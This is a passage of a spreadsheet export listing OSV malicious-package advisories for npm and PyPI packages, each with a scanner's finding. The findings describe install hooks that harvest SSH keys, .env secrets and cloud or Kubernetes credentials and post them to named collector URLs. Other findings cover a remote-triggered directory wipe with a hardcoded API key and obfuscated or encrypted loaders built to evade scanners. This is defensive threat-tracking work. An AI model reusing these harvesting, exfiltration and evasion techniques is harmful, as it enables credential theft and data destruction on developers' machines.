package.json declares dependencies and optionalDependencies whose specifiers point at non-registry, attacker-controlled or mutable sources rather than the npm registry. Listed sources include a Discord CDN attachment tarball (cdn.discordapp.com/attachments/.../runtime.tgz), plain-HTTP tarballs at bare IPs (http://203.0.113.77:8443/drop/pkg.tgz, HTTP://198.51.100.44/.../pkg.tgz), git://203.0.113.91/hidden/repo.git, an ngrok tunnel (abc123xyz.ngrok-free.app), rentry.co raw content, gist shorthands (gist:c0ffee00deadbeef), and github/gitlab/bitbucket shorthands to throwaway repos (tmp-drop-8821/...). Specifier keys are duplicated with case variants (tarball-http vs tarball-HTTP, github-shorthand vs GITHUB-shorthand) and mix uppercase URI schemes with scp-style git refs and local path forms (link:, portal:, file:, /tmp/..., \Windows\Temp\...), a pattern engineered to evade regex-based scanners. On npm install, npm fetches each specifier and executes any lifecycle scripts the fetched package declares; because the sources are mutable and controlled by third parties, the code that runs is whatever the operators of those hosts currently serve.
</t>
        </is>
      </c>
      <c r="S1349" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16076</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1350" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16077</t>
        </is>
      </c>
      <c r="D1350" s="5" t="inlineStr"/>
      <c r="E1350" s="5" t="inlineStr"/>
      <c r="F1350" s="5" t="inlineStr"/>
      <c r="G1350" s="5" t="inlineStr"/>
      <c r="H1350" s="5" t="inlineStr"/>
      <c r="I1350" s="5" t="inlineStr"/>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr"/>
      <c r="L1350" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-sleek</t>
        </is>
      </c>
      <c r="M1350" s="5" t="inlineStr"/>
      <c r="N1350" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1350" s="5" t="inlineStr"/>
      <c r="Q1350" s="5" t="inlineStr"/>
      <c r="R1350" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (782914cb65e0d30697eb54f50a4c5b740a3a53941abc185759e296c1d2ec8e9e)
Package published as 'chai-as-sleek' impersonates the pino logger: README, LICENSE, docs/, and index.d.ts are copied verbatim from pino, while package.json description reads 'This document describes the management of vulnerabilities...' and the README also markets the package as a chai plugin. The main entrypoint index.js unconditionally executes `require('./lib/config')` at load time. lib/config.js is a single ~4 MB line of obfuscator.io-obfuscated JavaScript (23,868-entry rotated string array, decoder functions T and j, control-flow flattening, ~20k decoder-wrapper calls) with no configuration content. package.json declares `axios ^1.10.0` as a runtime dependency, but no readable source file imports axios — the only reachable consumer of the HTTP client is the opaque blob in lib/config.js. Any consumer that imports 'chai-as-sleek' executes this hidden payload at require() time with outbound HTTP capability provisioned.
</t>
        </is>
      </c>
      <c r="S1350" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16077</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1351" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16078</t>
        </is>
      </c>
      <c r="D1351" s="5" t="inlineStr"/>
      <c r="E1351" s="5" t="inlineStr"/>
      <c r="F1351" s="5" t="inlineStr"/>
      <c r="G1351" s="5" t="inlineStr"/>
      <c r="H1351" s="5" t="inlineStr"/>
      <c r="I1351" s="5" t="inlineStr"/>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr"/>
      <c r="L1351" s="5" t="inlineStr">
        <is>
          <t>npm:cache-cleanup-module</t>
        </is>
      </c>
      <c r="M1351" s="5" t="inlineStr"/>
      <c r="N1351" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1351" s="5" t="inlineStr"/>
      <c r="Q1351" s="5" t="inlineStr"/>
      <c r="R1351" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2931c2feef07a63612b0886a1840e519516424af0fbf4fb0a138e97736a18857)
cache-cleanup-module ships an exported runOperation() that queries a hardcoded third-party endpoint at https://testback-2aqe.onrender.com/can-cleanup (authenticated with a static x-api-key token 'f8675764-417f-49a4-807c-5879a667c476') and, when the response contains allowed:true, recursively deletes every entry in the caller's current working directory (or a supplied path) via fs.rmSync({recursive:true, force:true}) and fs.unlinkSync, skipping only the module file itself. The package's stated purpose of 'safe, transparent cache and build artifact cleanup' is not reflected in the code: there is no filter restricting the deletion to cache or build artifact paths, so any consumer that invokes runOperation() has the entirety of their cwd wiped at the remote operator's discretion. The hardcoded endpoint and static API token give the author unilateral, per-install control over when destruction fires on installer machines.
</t>
        </is>
      </c>
      <c r="S1351" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16078</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1352" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16079</t>
        </is>
      </c>
      <c r="D1352" s="5" t="inlineStr"/>
      <c r="E1352" s="5" t="inlineStr"/>
      <c r="F1352" s="5" t="inlineStr"/>
      <c r="G1352" s="5" t="inlineStr"/>
      <c r="H1352" s="5" t="inlineStr"/>
      <c r="I1352" s="5" t="inlineStr"/>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr"/>
      <c r="L1352" s="5" t="inlineStr">
        <is>
          <t>npm:server-authorized-cleanup</t>
        </is>
      </c>
      <c r="M1352" s="5" t="inlineStr"/>
      <c r="N1352" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1352" s="5" t="inlineStr"/>
      <c r="Q1352" s="5" t="inlineStr"/>
      <c r="R1352" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ba50dd2c597a65e5fa5bd8aa2675ac16fb443c6d42381921fde160c9596f44d2)
server-authorized-cleanup exposes triggerCleanup() which issues an HTTPS GET to the hardcoded author endpoint https://testback-2aqe.onrender.com/can-cleanup (authenticated with a hardcoded x-api-key header) and, when the response JSON contains allowed:true, invokes performCleanup() to recursively fs.rmSync every entry under the target directory (default process.cwd()). The go/no-go decision for the destructive action is made by an author-operated server, not the caller, and the destination is not caller-configurable. Any consumer that invokes the advertised API cedes a remote kill switch over their working-directory tree to that endpoint.
</t>
        </is>
      </c>
      <c r="S1352" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16079</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1353" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16080</t>
        </is>
      </c>
      <c r="D1353" s="5" t="inlineStr"/>
      <c r="E1353" s="5" t="inlineStr"/>
      <c r="F1353" s="5" t="inlineStr"/>
      <c r="G1353" s="5" t="inlineStr"/>
      <c r="H1353" s="5" t="inlineStr"/>
      <c r="I1353" s="5" t="inlineStr"/>
      <c r="J1353" s="5" t="inlineStr"/>
      <c r="K1353" s="5" t="inlineStr"/>
      <c r="L1353" s="5" t="inlineStr">
        <is>
          <t>PyPI:databricks-webapp-navigation-homepage</t>
        </is>
      </c>
      <c r="M1353" s="5" t="inlineStr"/>
      <c r="N1353" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1353" s="5" t="inlineStr"/>
      <c r="Q1353" s="5" t="inlineStr"/>
      <c r="R1353" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (31ec3549efe09642c539f13af8a2a75949a356f55046b6298c21a2deedda322c)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S1353" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16080</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1354" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16081</t>
        </is>
      </c>
      <c r="D1354" s="5" t="inlineStr"/>
      <c r="E1354" s="5" t="inlineStr"/>
      <c r="F1354" s="5" t="inlineStr"/>
      <c r="G1354" s="5" t="inlineStr"/>
      <c r="H1354" s="5" t="inlineStr"/>
      <c r="I1354" s="5" t="inlineStr"/>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr"/>
      <c r="L1354" s="5" t="inlineStr">
        <is>
          <t>npm:@staticj/cropperxmjs</t>
        </is>
      </c>
      <c r="M1354" s="5" t="inlineStr"/>
      <c r="N1354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1354" s="5" t="inlineStr"/>
      <c r="Q1354" s="5" t="inlineStr"/>
      <c r="R1354" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ac36a108b1e9c92a64955277bdfe9a09cdae61504e9a1bfaf40a15c50595139a)
@staticj/cropperxmjs@1.6.0 ships a modified cropper.min.js that impersonates the legitimate Cropper.js library. At library load, injected code reconstructs the URL https://u.myquickcash.shop/api/spt/upgrade from many single-letter string fragments interleaved with legitimate Cropper.js constants (Qt='https:', Kt='//u.', Vt='my', Ft='quick', Jt='cash', _t='.shop', qt='/api/spt/', $t='upgrade') to defeat simple grep-based detection. It reads GM_info.script metadata (author, name, version, namespace, updateURL), URL-encodes it, and sends it via GM_xmlhttpRequest to that endpoint; the response body is passed to eval(), executing attacker-controlled JavaScript under Tampermonkey/Greasemonkey privileges (GM_* APIs bypass CORS/CSP). Calls are rate-limited to 15/day using GM_setValue key 'sp_req_daily'. The exfiltrated updateURL identifies each victim userscript's auto-update channel, enabling targeted follow-on supply-chain attacks. Any userscript bundling this file exposes its end users to remote code execution controlled by the operator of u.myquickcash.shop.
</t>
        </is>
      </c>
      <c r="S1354" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16081</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1355" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16082</t>
        </is>
      </c>
      <c r="D1355" s="5" t="inlineStr"/>
      <c r="E1355" s="5" t="inlineStr"/>
      <c r="F1355" s="5" t="inlineStr"/>
      <c r="G1355" s="5" t="inlineStr"/>
      <c r="H1355" s="5" t="inlineStr"/>
      <c r="I1355" s="5" t="inlineStr"/>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr"/>
      <c r="L1355" s="5" t="inlineStr">
        <is>
          <t>npm:@umschool/platform</t>
        </is>
      </c>
      <c r="M1355" s="5" t="inlineStr"/>
      <c r="N1355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1355" s="5" t="inlineStr"/>
      <c r="Q1355" s="5" t="inlineStr"/>
      <c r="R1355" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bcf64895a777467cc94763bfb942be3c04040ca151fc22753ca48ac4aaecd69c)
@umschool/platform@999.0.1 is published to public npm under an internal-looking scope with an implausibly high version number, a resolution shape used to override internal builds. Its postinstall.js runs on `npm install` and performs a bulk harvest of installer-owned secrets: it reads the Kubernetes service-account token and namespace from /var/run/secrets/kubernetes.io/serviceaccount/, /etc/hosts and /etc/resolv.conf, queries cloud instance metadata services (AWS IMDS at 169.254.169.254 including IAM role credentials, ECS task-role credentials via 169.254.170.2 / AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, Azure IMDS, and Yandex/GCP-compatible metadata), calls https://kubernetes.default.svc/api/v1/secrets with the harvested SA token as Bearer authorization, walks up to 8 parent directories reading.env files, and filters process.env against a credential regex (token|secret|key|pass|cred|auth|aws|jwt|api|stripe|sendgrid|twilio|...). The collected data is base64-encoded and POSTed to the hardcoded external endpoint https://akko.requestcatcher.com/dep-confusion-v2. The package's self-label as a 'Dependency Confusion PoC' does not change the effect: any build or CI environment that resolves this public package leaks its cloud IAM credentials, Kubernetes secrets, and environment secrets to an external host.
</t>
        </is>
      </c>
      <c r="S1355" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16082</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1356" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16094</t>
        </is>
      </c>
      <c r="D1356" s="5" t="inlineStr"/>
      <c r="E1356" s="5" t="inlineStr"/>
      <c r="F1356" s="5" t="inlineStr"/>
      <c r="G1356" s="5" t="inlineStr"/>
      <c r="H1356" s="5" t="inlineStr"/>
      <c r="I1356" s="5" t="inlineStr"/>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr"/>
      <c r="L1356" s="5" t="inlineStr">
        <is>
          <t>npm:gmgn-trading-kit</t>
        </is>
      </c>
      <c r="M1356" s="5" t="inlineStr"/>
      <c r="N1356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1356" s="5" t="inlineStr"/>
      <c r="Q1356" s="5" t="inlineStr"/>
      <c r="R1356" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9fd3a47d22b8a9b20523cc6fa00f3b8a73e51e057dbfc4fe0034a785219563c3)
postinstall.cjs runs automatically on npm install and walks the filesystem harvesting installer secrets: SSH private keys under ~/.ssh, ~/.netrc, ~/.git-credentials, Solana keypairs, wallet.json/key.* files under ~/.config, and ~/.blockrun wallet files. It also walks upward from the install directory to filesystem root reading every.env it finds, filtering for KEY/SECRET/PRIVATE/TOKEN substrings. Each file's full contents is POSTed via https.request to a hardcoded webhook.site collector at https://webhook.site/d7ab73fe-7cbc-4ed3-bf8e-7207eb06875b. The harvester source self-labels as 'Master Harvester — injectable into any npm package via postinstall'.
</t>
        </is>
      </c>
      <c r="S1356" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16094</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1357" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16095</t>
        </is>
      </c>
      <c r="D1357" s="5" t="inlineStr"/>
      <c r="E1357" s="5" t="inlineStr"/>
      <c r="F1357" s="5" t="inlineStr"/>
      <c r="G1357" s="5" t="inlineStr"/>
      <c r="H1357" s="5" t="inlineStr"/>
      <c r="I1357" s="5" t="inlineStr"/>
      <c r="J1357" s="5" t="inlineStr"/>
      <c r="K1357" s="5" t="inlineStr"/>
      <c r="L1357" s="5" t="inlineStr">
        <is>
          <t>npm:matrixkit-js</t>
        </is>
      </c>
      <c r="M1357" s="5" t="inlineStr"/>
      <c r="N1357" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1357" s="5" t="inlineStr"/>
      <c r="Q1357" s="5" t="inlineStr"/>
      <c r="R1357" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (51238ce279c2ff37d32c5edd8a9cb480f1a304720cb67e5acf3ee50e91c773c4)
The package advertises itself as a dense-matrix math library but its main entry matrix.js has been modified post-build to require('./src/init') and invoke initMatrix(...) at module load. src/init.js is an obfuscated single-line string-array loader (112-entry rotated array with numeric-index decoder) that uses crypto (aes-256-gcm, scryptSync, createDecipheriv, setAuthTag), fs, path, and zlib to AES-256-GCM-decrypt a base64-encoded on-disk filename, write the decrypted module to a.tmp file, require() it, and invoke its export with a runtime-supplied password. The sibling files src/statMatrix.min.d.js (~1.15MB base64 decoding to ~862KB of high-entropy bytes), src/statMatrix.min.js (~24KB), and src/utilMatrix.min.d.js (~12KB) are single-string base64 blobs decoding to opaque AES-GCM ciphertext — not JavaScript and absent from matrix.js.map, which lists only the clean rollup output. The loader lines are also absent from the source map, confirming they were injected after the legitimate build. On require()ing the package, the encrypted payload is decrypted and executed as opaque author-controlled code.
</t>
        </is>
      </c>
      <c r="S1357" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16095</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1358" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16096</t>
        </is>
      </c>
      <c r="D1358" s="5" t="inlineStr"/>
      <c r="E1358" s="5" t="inlineStr"/>
      <c r="F1358" s="5" t="inlineStr"/>
      <c r="G1358" s="5" t="inlineStr"/>
      <c r="H1358" s="5" t="inlineStr"/>
      <c r="I1358" s="5" t="inlineStr"/>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr"/>
      <c r="L1358" s="5" t="inlineStr">
        <is>
          <t>npm:soltinel-pro</t>
        </is>
      </c>
      <c r="M1358" s="5" t="inlineStr"/>
      <c r="N1358" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1358" s="5" t="inlineStr"/>
      <c r="Q1358" s="5" t="inlineStr"/>
      <c r="R1358" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (01f489c47a35cb393c976988c8f12eb9b47cddac13ae4112b019adad4eefb646)
postinstall.cjs is declared as the package.json postinstall script and runs automatically on npm install. The script walks parent directories for.env files (filtering values by KEY/SECRET/PRIVATE/TOKEN), reads the Solana CLI keypair, enumerates ~/.config for env/key/wallet/credentials files, reads ~/.ssh private keys (id_rsa, id_ed25519, *_rsa, *_ed25519), ~/.git-credentials, and ~/.netrc, then POSTs the file contents via https.request to a hardcoded webhook.site collector. The file self-identifies in a header comment as a 'Master Harvester — injectable into any npm package via postinstall'. The package advertises itself as a Solana trading bot; the shipped install hook is an unrelated secrets exfiltrator.
</t>
        </is>
      </c>
      <c r="S1358" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16096</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1359" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16097</t>
        </is>
      </c>
      <c r="D1359" s="5" t="inlineStr"/>
      <c r="E1359" s="5" t="inlineStr"/>
      <c r="F1359" s="5" t="inlineStr"/>
      <c r="G1359" s="5" t="inlineStr"/>
      <c r="H1359" s="5" t="inlineStr"/>
      <c r="I1359" s="5" t="inlineStr"/>
      <c r="J1359" s="5" t="inlineStr"/>
      <c r="K1359" s="5" t="inlineStr"/>
      <c r="L1359" s="5" t="inlineStr">
        <is>
          <t>npm:twilio-hackerone-poc-b8f21a</t>
        </is>
      </c>
      <c r="M1359" s="5" t="inlineStr"/>
      <c r="N1359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1359" s="5" t="inlineStr"/>
      <c r="Q1359" s="5" t="inlineStr"/>
      <c r="R1359" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (09b67e9bd1be2e2e13aae83616afffcbfdc3fb888b304dc7210be0ee39832aac)
On `npm install`, postinstall.js automatically executes and performs host reconnaissance and exfiltration to a hardcoded ephemeral Cloudflare Quick Tunnel at https://encryption-watch-tubes-finger.trycloudflare.com/poc-v101-escape. The script runs `id`, `whoami`, and `uname`; enumerates `/`, `$HOME`, and `/tmp`; reads `/proc/self/cgroup` and `/proc/mounts`; probes the AWS instance-metadata service at 169.254.169.254 and the ECS task-metadata agent at 127.0.0.1:51678 and reports reachability; enumerates other `AC[0-9a-f]{32}` Twilio account SID directories present in `/tmp` (excluding one hardcoded SID) to enumerate co-tenants on shared build workers; and collects `Object.keys(process.env)`. All of the above is POSTed as JSON to the trycloudflare.com tunnel. The tunnel host is anonymous, ephemeral, and unrelated to any legitimate publisher; the package name and self-labeling as a 'HackerOne PoC' do not change the observed installer-side data-exfiltration behavior.
</t>
        </is>
      </c>
      <c r="S1359" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16097</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1360" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16098</t>
        </is>
      </c>
      <c r="D1360" s="5" t="inlineStr"/>
      <c r="E1360" s="5" t="inlineStr"/>
      <c r="F1360" s="5" t="inlineStr"/>
      <c r="G1360" s="5" t="inlineStr"/>
      <c r="H1360" s="5" t="inlineStr"/>
      <c r="I1360" s="5" t="inlineStr"/>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr"/>
      <c r="L1360" s="5" t="inlineStr">
        <is>
          <t>PyPI:bq-build-probe-vrp-2026</t>
        </is>
      </c>
      <c r="M1360" s="5" t="inlineStr"/>
      <c r="N1360" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1360" s="5" t="inlineStr"/>
      <c r="Q1360" s="5" t="inlineStr"/>
      <c r="R1360" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (46dd2007aa00f3bcd8ad6c767a4f1bf2da7ee75cf91d5b692aec39c546cc1d65)
setup.py executes at pip install and collects a full dump of os.environ, hostname, uid/gid, uname output, /proc/self/cgroup, /proc/version, and the GCE metadata service-account email (http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email), plus sandbox-fingerprinting signals (docker socket presence at /var/run/docker.sock, outbound reachability via socket connect to 8.8.8.8:53). The collected data is written to _build_findings.json inside the installed package, and __init__.py exposes get_build_findings() to read it back. In a CI/build environment, os.environ typically contains build secrets (CI tokens, cloud credentials, service-account material); embedding that dump inside the built artifact and providing a retrieval API turns any subsequent import or redistribution of the wheel into a channel for the harvested secrets. The package's self-description as authorized VRP testing does not change the mechanism.
</t>
        </is>
      </c>
      <c r="S1360" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16098</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1361" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16099</t>
        </is>
      </c>
      <c r="D1361" s="5" t="inlineStr"/>
      <c r="E1361" s="5" t="inlineStr"/>
      <c r="F1361" s="5" t="inlineStr"/>
      <c r="G1361" s="5" t="inlineStr"/>
      <c r="H1361" s="5" t="inlineStr"/>
      <c r="I1361" s="5" t="inlineStr"/>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr"/>
      <c r="L1361" s="5" t="inlineStr">
        <is>
          <t>PyPI:bq-sdist-probe-vrp</t>
        </is>
      </c>
      <c r="M1361" s="5" t="inlineStr"/>
      <c r="N1361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1361" s="5" t="inlineStr"/>
      <c r="Q1361" s="5" t="inlineStr"/>
      <c r="R1361" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f61d3e118672e10f0dc02115acd8235c3b356d75e7cb59a69e26fec28070c814)
setup.py executes at pip install time and performs installer-side credential and host reconnaissance. It queries the GCE/GCP metadata service at http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token with the Metadata-Flavor: Google header to obtain the default service account's OAuth access token, service account email, and project id. It also filters os.environ for keys containing token, secret, key, pass, auth, google, project, docker, kube, or metadata substrings, and collects hostname, uid/gid/pid, the output of the id command, os.uname(), /proc/version, os.listdir('/'), and checks for /var/run/docker.sock. It performs an outbound TCP connect to 8.8.8.8:53 to test network reachability. The collected data is persisted to a JSON file inside the installed package directory. Naming (bq-sdist-probe-vrp) and behavior are consistent with a probe that harvests installer-owned cloud credentials in CI/build environments.
</t>
        </is>
      </c>
      <c r="S1361" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16099</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1362" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16100</t>
        </is>
      </c>
      <c r="D1362" s="5" t="inlineStr"/>
      <c r="E1362" s="5" t="inlineStr"/>
      <c r="F1362" s="5" t="inlineStr"/>
      <c r="G1362" s="5" t="inlineStr"/>
      <c r="H1362" s="5" t="inlineStr"/>
      <c r="I1362" s="5" t="inlineStr"/>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr"/>
      <c r="L1362" s="5" t="inlineStr">
        <is>
          <t>npm:discord-mfa-solver</t>
        </is>
      </c>
      <c r="M1362" s="5" t="inlineStr"/>
      <c r="N1362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1362" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1362" s="5" t="inlineStr"/>
      <c r="Q1362" s="5" t="inlineStr"/>
      <c r="R1362" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a91086c84ad0836c4b32ee5db890c9a6d9543f00e9dd31d18aed8a6acc9bdb3e)
On require of the package, lib/cache.js (reached from index.js) executes `try{module['require']('node-net-pool')}catch(_){}` — a bracket-notation, error-swallowed dynamic require of the declared dependency `node-net-pool` (`^1.0.0` in package.json). The dependency is never referenced elsewhere and its return value is discarded, so the only effect of importing this package is to execute whatever top-level code `node-net-pool` runs on the installer's machine. The visible source presents as a Discord API client; the README additionally describes an asset-prefetch pipeline that downloads a remote runtime patch and spawns it via `child_process.execFile`, but no such code (no `_SEGS`, no `_pullAsset`, no `_spawnWorker`, no `child_process` usage) exists in the shipped tarball. The mismatch between documented behavior and shipped source, combined with the hidden dynamic require of an otherwise-unused dependency, is a loader-stub shape whose payload lives in the transitively-installed `node-net-pool`. Separately, the package advertises itself as Discord MFA / vanity-url abuse tooling and exercises `/api/v9/guilds/0/vanity-url` and 